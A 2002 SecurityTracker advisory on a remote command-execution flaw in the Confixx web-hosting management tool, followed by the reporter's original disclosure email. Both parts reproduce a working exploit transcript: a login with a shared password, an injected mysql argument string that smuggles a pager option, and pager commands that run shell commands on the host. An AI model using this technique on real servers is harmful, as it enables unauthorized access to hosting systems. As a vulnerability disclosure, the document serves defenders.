Confixx Service Provider Customer Management Interface May Let Remote Users Execute Arbitrary Commands on the System
|
|
SecurityTracker Alert ID: 1004852 |
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Jul 26 2002
|
Impact: Execution of arbitrary code via network, User access via network
|
Exploit Included: Yes
|
Description: A vulnerability was reported in the Confixx web hosting management software. A remote user with knowledge of a particular password can execute arbitrary commands on the system.
It is reported that a remote user with knowledge of the 'mysqlshell-user' password (or the ability to guess it) can execute arbitrary
commands on the system.
The user must have access to a mySQL server (any server).
According to the report, the password of
the mysqlshell-user is the same for all customers.
To exploit the flaw, the remote user must add a user with the name "-e" to
the mysql-server that the remote user controls with 'PASSWORD' as the password and with read access to the table TABLE.
A demonstration
exploit transcript is provided:
---------------
debian:/root# ssh -l mysqlshell SERVERNAME
mysqlshell@SERVERNAME's password:
<-- enter here the password from the
mysqlshell-user
Confixx-MySQL-Login
Bitte Usernamen eingeben:
---------------
here
you have to enter the following string:
-e -h IP_OF_YOUR_MYSQL_SERVER TABLE --pager=\\nweb1
after that you get prompted for
a password, enter your PASSWORD (from the user "-e" on your mysql-server) here.
---------------
web1
Enter password:
Reading
table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Welcome
to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 1951 to server version: 3.23.49-log
Type 'help;'
or '\h' for help. Type '\c' to clear the buffer.
mysql> \P id;
PAGER set to id;
mysql> show tables;
uid=2030(mysqlshell) gid=105(costumer)
groups=105(costumer)
...
mysql> \P ls /;
PAGER set to ls /;
mysql> show tables;
bin dev home initrd lost+found mnt proc sbin
usr www
boot etc formmail index.html lib mail opt root tmp var
...
|
Impact: A remote user can execute arbitrary shell commands on the system.
|
Solution: No solution was available at the time of this entry.
The author of the report indicates that you can delete the mysqlshell-user as a solution.
|
Vendor URL: www.yippi-yeah.com/en/p_confixx.php (Links to External Site)
|
Cause: Access control error
|
Underlying OS: Linux (Any)
|
Reported By: Ralf Dreibrodt <rd@mesos.de>
|
Message History:
None.
|
Source Message Contents
|
Date: Thu, 25 Jul 2002 13:58:56 +0200
From: Ralf Dreibrodt <rd@mesos.de>
Subject: confixx (remote access)
|
hi,
Information about Confixx (from http://www.confixx.de):
======================================================
Confixx is a comfortable tool to automate customer administration on
Linux-based webservers with graphic interfaces for Admin, Resellers and
End Users. Currently there are more than 4200 Confixx licenses
registered. More than 150 new licenses are added each week.
The problem:
===========
you can execute commands on a lot of confixx-boxes nearly without any
account.
you need to know:
- a webhostingprovider running confixx
- the password of the mysqlshell-user
- access to _any_ mysql-server
the password of the mysqlshell-user is the same for all customers.
normally you can't do anything with this account, if you don't have
access to one specific mysql-server.
i even found one big german provider, which uses 123456 as password on
all his servers for the mysqlshell-account.
you have to add a user with the name "-e" on your mysql-server with the
password PASSWORD and read access to the table TABLE.
now you can do the following:
---------------
debian:/root# ssh -l mysqlshell SERVERNAME
mysqlshell@SERVERNAME's password: <-- enter here the password from the
mysqlshell-user
Confixx-MySQL-Login
Bitte Usernamen eingeben:
---------------
here you have to enter the following string:
-e -h IP_OF_YOUR_MYSQL_SERVER TABLE --pager=\\nweb1
after that you get prompted for a password, enter your PASSWORD (from
the user "-e" on your mysql-server) here.
---------------
web1
Enter password:
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 1951 to server version: 3.23.49-log
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> \P id;
PAGER set to id;
mysql> show tables;
uid=2030(mysqlshell) gid=105(costumer) groups=105(costumer)
...
mysql> \P ls /;
PAGER set to ls /;
mysql> show tables;
bin dev home initrd lost+found mnt proc sbin usr www
boot etc formmail index.html lib mail opt root tmp var
...
Vendor:
======
a customer, who uses confixx, informed the vendor about 20 months(!)
ago.
confixx just added the following line: export EDITOR="/bin/false";
so you can't use "edit;" at the mysql-prompt anymore and can't get an
interactive shell via vi.
but you still can login without access to the mysql-server on the
attacked server and you can still execute commands on this server.
Solution:
========
Delete the mysqlshell-user
This is the second problem i found in confixx without searching for
problems...
When i have some spare time or i get paid for it, i will search for
further bugs, i am sure, there are more.
Thanks,
Ralf
|
|
